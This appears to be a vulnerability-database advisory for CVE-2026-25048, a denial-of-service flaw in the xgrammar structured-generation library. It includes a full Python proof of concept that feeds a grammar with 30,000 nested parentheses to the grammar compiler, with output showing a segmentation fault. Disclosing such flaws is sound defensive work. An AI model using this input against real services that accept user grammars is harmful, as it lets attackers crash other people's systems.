CVE-2026-25048 is a low severity vulnerability with a CVSS score of 0.0. No known exploits currently, and patches are available.
Very low probability of exploitation
EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.
The multi-level nested syntax caused a segmentation fault (core dump).
A trigger stack overflow or memory exhaustion was caused by constructing a malicious grammar rule containing 30,000 layers of nested parentheses.
#!/usr/bin/env python3
"""
XGrammar - Math Expression Generation Example
"""
import xgrammar as xgr
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer, AutoConfig
s = '(' * 30000 + 'a'
grammar = f"root ::= {s}"
def main():
device = "cuda" if torch.cuda.is_available() else "cpu"
model_name = "Qwen/Qwen2.5-0.5B-Instruct"
# Load model
model = AutoModelForCausalLM.from_pretrained(
model_name,
torch_dtype=torch.float16 if device == "cuda" else torch.float32,
device_map=device
)
tokenizer = AutoTokenizer.from_pretrained(model_name)
config = AutoConfig.from_pretrained(model_name)
# Math expression grammar
math_grammar = grammar
# Setup
tokenizer_info = xgr.TokenizerInfo.from_huggingface(
tokenizer,
vocab_size=config.vocab_size
)
compiler = xgr.GrammarCompiler(tokenizer_info)
compiled_grammar = compiler.compile_grammar(math_grammar)
# Generate
prompt = "Math: "
inputs = tokenizer(prompt, return_tensors="pt").to(device)
xgr_processor = xgr.contrib.hf.LogitsProcessor(compiled_grammar)
output_ids = model.generate(
**inputs,
max_new_tokens=50,
logits_processor=[xgr_processor]
)
result = tokenizer.decode(
output_ids[0][len(inputs.input_ids[0]):],
skip_special_tokens=True
)
print(f"Generated expression: {result}")
if __name__ == "__main__":
main()
> pip show xgrammar
Name: xgrammar
Version: 0.1.31
Summary: Efficient, Flexible and Portable Structured Generation
Home-page:
Author: MLC Team
Author-email:
License: Apache 2.0
Location: /home/yuelinwang/.local/lib/python3.10/site-packages
Requires: numpy, pydantic, torch, transformers, triton, typing-extensions
Required-by:
> python3 1.py
`torch_dtype` is deprecated! Use `dtype` instead!
Segmentation fault (core dumped)
DoS
Please cite this page when referencing data from Strobes VI. Proper attribution helps support our vulnerability intelligence research.